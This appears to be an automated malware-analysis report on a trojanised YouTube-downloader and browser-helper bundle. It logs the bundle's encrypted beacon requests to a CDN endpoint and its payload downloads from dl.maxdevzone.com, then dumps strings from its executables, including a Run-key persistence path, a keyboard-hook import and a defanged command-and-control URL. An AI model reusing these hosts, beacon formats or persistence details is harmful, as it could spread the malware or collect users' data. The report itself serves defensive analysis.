GET /27136.ashx?e=aQQpsP6/AW3asU58GPZMZUQ1GWwIMthwOB8LVXt4qhaAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRpMGDKQa0FePPceMBfl/cy7pBWSGYE25tjgb6v7cXpPvkBonvh1TCK4JQffTeIm3ijZpz1sPcxp1I3nypnKAJJwSlVcxDMMid7CGwBqpnIsOpo/lEjpeAlBzFcuANGYcs6QVPVP6/3bDcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2AUI/TbDoS6cQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMBVBPfpXcC0NNCUHeR8YCF35glrEy57w/m07ReD/zc3 EeXoYNe9IIH8NVcbx dWxSReJECB10wJoxWgtYjek0xghq6RzWLsFaV2a3pWCTy1K5oVP3GqZY3pzYLgoZ4xWNniPNzdiMCZhKHLVCAz6ZQsefjE2MjqpXZgKAqHEqChQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=xY8ohDYpM iI4k8LaFSbf2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMDqVqSY7buIRtCUHeR8YCF3BQ8MIYMfS0tAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:26 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAtaAQab8C2sQTxIUcsgQ wzdQpwoYb2d0uTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF2Et8EPpFBXSUCOCGFuwZcChv/PiC3eG4oUVviRAos4otKOgpxEcX4mOWTBRoXJJz/rKwD6t b1ZR4j1VNOEsndFPhdC l28/ a9Ya/86pUpQ3MNfQbUufSXu086SR5S8= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XPB 4EkIHdGP2rex8R/qraqnvZi s3jtzHHU/jEYNR1P0lsAQkxXUtnghmiZJc6KBe9Kbi6m4oCRkTGhxdyALnfrmdOXTAhi8THTtTt4rP ovDfknCUwfuRDHGXB7YFOPH7H OCiIJdXed4zY8kJssz333RAvM0VMAmyeS/0faBVTdVMo67fxO0s IILilpWF0JzvOmbeJDXy5MYXZwv0Sa2 GUfuos17apw1GQ93goy8ou0ipnPyAcC4K0pGUhWjZ3f64oXp7sfQ8Kj6Mu8v3vRYAGA yJTjm4X1w8Zq00iu0G5YLl Sb68Tidbbz5Drk= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjxBAEp0wLfKOWnHKXQ4ByT9CUHeR8YCF3cICI7/tQlejZeojEglKF4ySWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:27 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=oE Olq3N8DJENRlsCDLYcDgfC1V7eKoWgDEcVfgp paILtUXHuyvMn5dMiu8MPG0G04r2GZQbxA4k4Gm5vvSsk7q1DqDoShwFmblcMjHXReA74CIMkIVuBTjoJMNpFu87wf8xFonEcPDYfiiZa9KEaTBgykGtBXjGxrTqW15vZAooxpS5ufgquJVjHmrT0TCdGBVM3gUbVwDpXxHWgmjuq9qGTCPFxGMacNTVL60tsKrgHWJBZg2eTkxN6pxw89Ap19bfV/XketHQPSr00xn/pt5BjWOuab4BLZMo3KhL4A7oa41N9YhxikzL8hyzXRMc0g1gcxjite /Y3KN3CLINidK03d0MuzZPHJU0qA9vA9GanF1RNNmMzXUezINFlsIV5dJNE8xQtEL6kO6MAPPRk3pYsWha92dV1 PcKMtTouTGF2cL9EmtvhlH7qLNe2qcNRkPd4KMvKLtIqZz8gHAuCtKRlIVo2d3 uKF6e7H0PCo jLvL970WABgPsiU45uF9cPGatNIrtBuWC5fkm vE4nW28 Q65 HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1mzeUpkoQZA95XGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuY hmSQlakOO/yw2dOqRz0VTJIBlhaXll/jgb6v7cXpPsHbyM38hHidfzjtSC7/eFaNh3QJEALW3T8P/xsh451fiSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=N6dOqWm8Q95rOakOyNRzsN5jOExRmJjcpL1q0D3vvXQ2fVsQFDtppKaDl0KcD5tVUA7dl9owwhIeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0DOGtgSBCtpWMnNHFDGURlx2SsMiXJFnYjCD6AQoJRo0ATae6NSkcvIROPie2z40 X0A62pnUj3KYX3Ti/i3YMtu6Il6K42s07l01ouN0CW2hnxCMb9MQTrbPokHTCrpfDVXG8fnVsUkXiRAgddMCaMVoLWI3pNMYIaukc1i7BWldmt6Vgk8tSuaFT9xqmWN6c2C4KGeMVjZ4jzc3YjAmYShy1QgM mULHn4xNjI6qV2YCgKhxKgoU= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=j7YMo/n29XMVCZIctrluXs30ehTmVX1moiejxERrnrFXGmhmyGgv7nVMtS3FkLVnp2RYIisGWDtlUrzhzYzRp1pO0uZjbwWll7Nx/213VNE6JXbpA88dZXJ6A7OzALu5zbBYCuaAtAvGkllEOJq0sp3jz2it1PuYvKyHshi0NtNKXe7b3ey81Z7hCmg7VZxoKYX3Ti/i3YPRE4iM0F3Z8SSWkiD 8aIWFAbDvDttaaPPt30posPzj93QiescafgJMQkn33NAlOpViA7TIcAcSxgCqL7xsniQvSm4upuKAkZExocXcgC5365nTl0wIYvEx07U7eKz/qL38Km4JMgAXQ== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=W5y9y1UrGBkT/daslwwbUi1X0eix9R7PaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFaACykertHSFfOKWYd4uGNAB/MXM5vy8Es IILilpWF3E4CvODJISMmgJ1E0DOBKFm3OtmTG7fpbuOInD4IpbV04k1C4lssAWX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:28 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=Feo0TQZfu6KSwU3ck0YwnkQ1GWwIMthwsNv oCoFDuAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRbrsFepywjbPfV9OCtHXZfA3mXJEY39mHAhwsRGINruja7CNvvxDM30ViblVFPL pCuWqMo7ZG/Qxztg6 4zwmphq5YRs3Ua3kOLZWZ3INLBBsDkaVI3Au2 WNxArStCUlpNEzah78fl5Xe6ZTKO9HKqfV3Ow7bWoU7zGYxFVZk5vuPkkDKInkPC8afBy6IKMEefda087tOQ TnksFA3b2toTYm7KkeYVZVK84c2M0adaTtLmY28FpZezcf9td1TROiV26QPPHWU1VVI0/LSiBw== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:29 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=obiBp3WOda9tb/LgACKPGkQ1GWwIMthw2qShU7Jjo1uAMRxV Cn6logu1Rce7K8yfl0yK7ww8bQbTivYZlBvEDiTgabm 9KyTurUOoOhKHAWZuVwyMddF4DvgIgyQhW4FOOgkw2kW7zvB/zEWicRw8Nh KJlr0oRAKcFpVLy3NZgKkdlz1lRofr/zw3mMKgg0JQd5HxgIXcyW34jq/xhC69GO739HYqB8SJA d bWCFeYyujkXy401 gAUOMZfgulwJkQAVG5kmEQOVvkS6cCKC4/FjewiPFSVqU1IXaHrWwEISYEO9NS7nUJRtduGvIRTkwMJcPGBd7kwVzNWOrfuirThnOyWCqILJt Jqyltk= HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:31 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=c2mW1WEUbCET/daslwwbUogIgfgifRkfaMzgTHP7UuyprdrU7aLZjhtIkRVrgKLwRdb/S8YKHkPcr4ZRnoqTVUOgPoSQeroSQMPOYURUu2BNfh4qpckIN6kO9/DuORuprIIa1xct7ImOrIk6OakHpXG9WQc5JBBFclHT2qvGHts3SQCeXx1TCLUISLCJlFqul4CnWC C4vHu2csK9H8/A3AVeGnpHjBs0JQd5HxgIXcvF5YR0KhEBdvPLr6VHnfYX6ABQ4xl C6XAmRABUbmSYRA5W RLpwIoLj8WN7CI8VJWpTUhdoetbAQhJgQ701LudQlG124a8hFOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2Q== HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:32 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /27136.ashx?e=QHucCbLl /YLjT49fHfOTKA34GYfZJUsjvdcLv9L0UIbIGZvOdVpu1XTUggPGJK SlCyq068/M1FOTAwlw8YF3uTBXM1Y6t 6KtOGc7JYKogsm34mrKW2XwF8xC533FcDPI5dGTWg7/iOZEO6FSB/sV8mKKVLIm1QG1CxyaZxv/Uh 3ZGDmdW5pZis9f nTddyS4BuUDC9WTdXgG3d7dLk5dEnxxU7GnDLXqPK521tdAjghhbsGXAob/z4gt3huKFFb4kQKLOKLSjoKcRHF JjlkwUaFySc/6ysA rfm9WUeI9VTThLJ3RT4XQvpdvP/vmvWGv/OqVKUNzDX0G1Ln0l7tPOkkeUv HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 5.1)
Host: 4g3dwvcs2-zxis6jz8.netdna-ssl.com


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:18:35 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS


GET /bxsdk32.dll HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: dyd9qf154h76q.cloudfront.net
Connection: Keep-Alive


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 942080
Connection: keep-alive
Date: Wed, 05 Aug 2015 01:43:20 GMT
Last-Modified: Tue, 25 Nov 2014 14:05:45 GMT
ETag: "05c47da12b0009bd98653f51287f7768"
Accept-Ranges: bytes
Server: AmazonS3
Age: 34381
X-Cache: Hit from cloudfront
Via: 1.1 285c2c55f99cbebf129726ce90679db6.cloudfront.net (CloudFront)
X-Amz-Cf-Id: ttW5rJ_Hd-gTatxPJ7sNHzyPNwuiJe2pZt_ziMFfqyY7OcHZEUbKQw==

<<< skipped >>>

GET /utility.gif?report=fdata&f=3&c=1729&i=35&n=ms_about_to_exc&rnd=25324 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 13 Aug 2015 11:19:31 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..


GET /web/gf/all/setup.exe_c HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433375"
Last-Modified: Thu, 13 Aug 2015 02:36:15 GMT
Cache-Control: max-age=1268
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop002.am4.t,1439464765.cds058.am4.c

<<< skipped >>>

GET /web/gf/all/setup.exe_a HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:25 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439433370"
Last-Modified: Thu, 13 Aug 2015 02:36:10 GMT
Cache-Control: max-age=1267
Content-Length: 2124006
Content-Type: text/plain
X-HW: 1439464766.dop019.am4.t,1439464765.cds054.am4.c

<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe_e HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 13 Aug 2015 11:19:26 GMT
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1439448690"
Last-Modified: Thu, 13 Aug 2015 06:51:30 GMT
Cache-Control: max-age=3207
Content-Length: 2026234
Content-Type: text/plain
X-HW: 1439464766.dop019.am4.t,1439464766.cds038.am4.sr,1439464765.dop007.dc1.r,1439464766.cds023.dc1.c,1439464766.cds038.am4.pr

<<< skipped >>>

GET /spdbt/shoppy/snsch7.exe_b HTTP/1.1
Host: dl.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache




<<< skipped >>>

GET /utility.gif?report=fdata&f=1&c=001729&i=100&n=init_start_funnel_step_name&rnd=1439464836 HTTP/1.1
Host: errors.maxdevzone.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: loISk0rVVmvriLdWMzgdp2e TXvYBEFyiFds68dtB30HMCw9wppZxWfXtQ82LvJo
x-amz-request-id: 039A4FA8D7DF6531
Date: Thu, 13 Aug 2015 11:19:47 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Sun, 02 Aug 2015 12:57:10 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..


The Trojan connects to the servers at the following location(s):

BROWSE~2.EXE_3920:

.text
`.rdata
@.data
.rsrc
@.reloc
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
Process token open Error: %u
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelperSrv\2013_with_xp\BrowserHelperSrv.pdb
KERNEL32.dll
USER32.dll
ADVAPI32.dll
GetProcessHeap
GetCPInfo
zcÁ
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
4 5 52585>5
01S1|3
Amscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
BrowserHelper.exe
explorer.exe
Software\Microsoft\Windows\CurrentVersion\Run
e:%d s:%d
\BrowserHelper.exe
C:\PROGRA~1\YTDOWN~1\BROWSE~2.EXE

BrowserHelper.exe_3032:

.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
Higher: %x
Lower: %x
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
operator
GetProcessWindowStation
C:\Builds\Build_YTDownloader\Client\WFP\BrowserHelper\2013_with_xp\BrowserHelper.pdb
WinExec
KERNEL32.dll
SetWindowsHookExW
UnhookWindowsHookEx
USER32.dll
RegCloseKey
RegCreateKeyExW
RegDeleteKeyW
RegEnumKeyW
RegNotifyChangeKeyValue
RegOpenKeyW
RegOpenKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
HttpOpenRequestW
HttpAddRequestHeadersW
HttpSendRequestW
HttpSendRequestExW
HttpEndRequestW
HttpQueryInfoW
WININET.dll
VERSION.dll
PSAPI.DLL
GetCPInfo
GetProcessHeap
zcÁ
.?AVCHttp@@
C:\PROGRA~1\YTDOWN~1\BrowserHelper.exe
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
@Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
HTTP/1.1
XXX
Content-Disposition: form-data; name="%s"
HTTP/1.0
Software\Microsoft\Windows\CurrentVersion\Internet Settings
SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
Windows 95
Windows 98
Windows Me
Windows NT
Windows 2000
Windows XP
Windows 2003 Server
Windows Vista
Windows 7
Windows CE
%sLow\%s\
%s\%s\%s\
%C:\Users\Public\Documents\%s\%s\
%s\Application Data\%s\%s\
ConfigDB.dll
config.xml
<d/d/%d d:d:d::d 0x%X>
[SbTracer::ReadConfiguration] Trace Level: %d
[SbTracer::ReadConfiguration] Trace Destination: %d
[SbTracer::ReadConfiguration] Trace Backup: %d
[SbTracer::ReadConfiguration] Trace Time Limit: %d
[SbTracer::ReadConfiguration] Trace Time Stamp: %d
[SbTracer::ReadConfiguration] Trace Max Size: %d
[SbTracer::FormatFilePath] ___Error - GetModuleFileName: %s
[SbTracer::FormatFilePath] ___Warning - No Log folder: %s
[SbTracer::FormatFilePath] ___Error - RecursiveCreateDirectory: %s
[SbTracer::FormatFilePath] Log Path: %s
[SbTracer::RecursiveCreateDirectory] ___Error - Directory: %s
[SbTracer::RecursiveCreateDirectory] ___Error - CreateDirectory: %s
[SbTracer::RecursiveCreateDirectory] Directory: %s
[SbTracer::OpenTraceFile] ___Error: %d, File: %s
[SbTracer::WriteTraceLine] !!! OVERFLOW or FORMAT ERROR !!! - (%d) %s
[SbTracer::OpenTraceFile] Done %s
[SbTracer::BackupTraceFile] %s
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegOpenKeyEx
[SbTracer::RegisterOnConfigurationChange] ___Error: %d, RegNotifyChangeKeyValue
\StringFileInfo\x\%s
kernel32.dll
WININET.DLL
user32.dll
[CIEDownloadAcceleratorEngine::CallDAP] ___Error CreateProcess: %s, Parameters: %s. LE: %d
[CUtils::GetDAPExeLocation] Name: %s
[CUtils::GetDAPExeLocation] ___Error read DAP location from %s
PipeName
[CUtils::GetDAPPipeName] Name: %s
[CUtils::GetDAPPipeName] ___Error read DAP Pipe Name from %s
[CUtils::GetDAPWindowName] Name: %s
[CUtils::GetDAPWindowName] ___Error read DAP Window Name from %s
%d.%d.%d.%d
"%s" "%s"
d/d/%d d:d:d::d
"%s" %s
[CUtils::GoToURL] ___Error WinExec url = %s, defBrowser = %s, err = %d
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe
%d-d-d
0.0.0.0
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\Internet.exe
%Program Files%\Internet Explorer\IEXPLORE.EXE
http\shell\open\command
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\*.lnk
Mozilla Firefox
Google Chrome
explorer.exe
&exe%d=%s&ver%d=%s&arr%d=%s
&ver=%s&InstDate=%s&userid=%s&usid=%s&aff=%s&date=%s%&ch=%s&ch_pin=%s&ff=%s&ff_pin=%s&ie=%s&ie_pin=%s&in=%s&in_pin=%s&def=%s&ie2=%s&global=%s&num=%d
hXXp://hcfq9zfs.vmgoxp64.netdna-cdn.com/b.ashx?
BrowserHelper.txt
BrowserHelperBk.txt
Chrome
Mozilla
iexplore.exe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
portuguese-brazilian
USER32.DLL
%s?e=%s
zvl=%s&
1.7.0.0
Updater.exe

YTDownloader.exe_3496:

.text
`.rdata
@.data
.idata
.rsrc
@.reloc
1.3.6.1.4.1.311.2.1.12
1.2.840.113549.1.9.5
1.2.840.113549.1.9.6
CRtmpParser::GetFieldDataString
CRtmpParser::GetFieldDataNumber
NetStream.Play.Reset
NetStream.Unpause.Notify
NetStream.Pause.Notify
NetStream.Seek.Notify
NetStream.Play.Stop
NetStream.Play.Failed
NetStream.Failed
()$^.* ?[]|\-{},:=!
video/WebM
"url_encoded_fmt_stream_map": "(.*?)"
rtmpe%3Dyes
url_encoded_fmt_stream_map=
%s, string reference, index: %d, not supported, ignoring!
%s - AMF3 unknown/unsupported datatype 0xx, @%p
AMF3_DATE reference: %d, not supported!
Property: <%s%s>
timestamp: %.2f, UTC offset: %d
INVALID TYPE 0xx
Property: <%sSTRICT_ARRAY>
Property: <%sECMA_ARRAY>
Property: <%sOBJECT>
AMF_Encode - failed to encode property in index %d
%s, invalid type. %d
%s, failed to decode AMF3 property!
Member: %s
Class name: %s, externalizable: %d, dynamic: %d, classMembers: %d
Class reference: %d
Object reference, index: %d
%s: Empty buffer/no buffer pointer!
%s - unknown datatype 0xx, @%p
AMF_TYPED_OBJECT not supported!
AMF_REFERENCE not supported!
%s: Name size out of range: namesize (%d) > len (%d) - 2
%s: Not enough data for decoding with name, less than 4 bytes!
HTTP/1
%s, Setting socket timeout to %ds failed!
%s, No SSL/TLS support
HTTP_get
If-Modified-Since: %s
GET %s HTTP/1.0
User-Agent: %s
Host: %s
Mozilla/5.0
%s, d %s %d d:d:d GMT
size: x
date: %s
ctim: %s
url: %.*s
%s: couldn't open %s for writing, errno %d (%s)
%s: couldn't contact swfurl %s (HTTP error %d)
%s: swfurl %s not found
%s: connection lost while downloading swfurl %s
1.1.4
%s%s\.swfinfo
%s: %s
hXXp://
[[IMPORT]]
No application or playpath in URL!
Invalid port number!
No hostname in URL!
Parsed protocol: %d
RTMP URL: No :// in url!
NetConnection.confStream
NetStream.Publish.Start
NetStream.Play.UnpublishNotify
NetStream.Play.PublishNotify
NetStream.Play.Complete
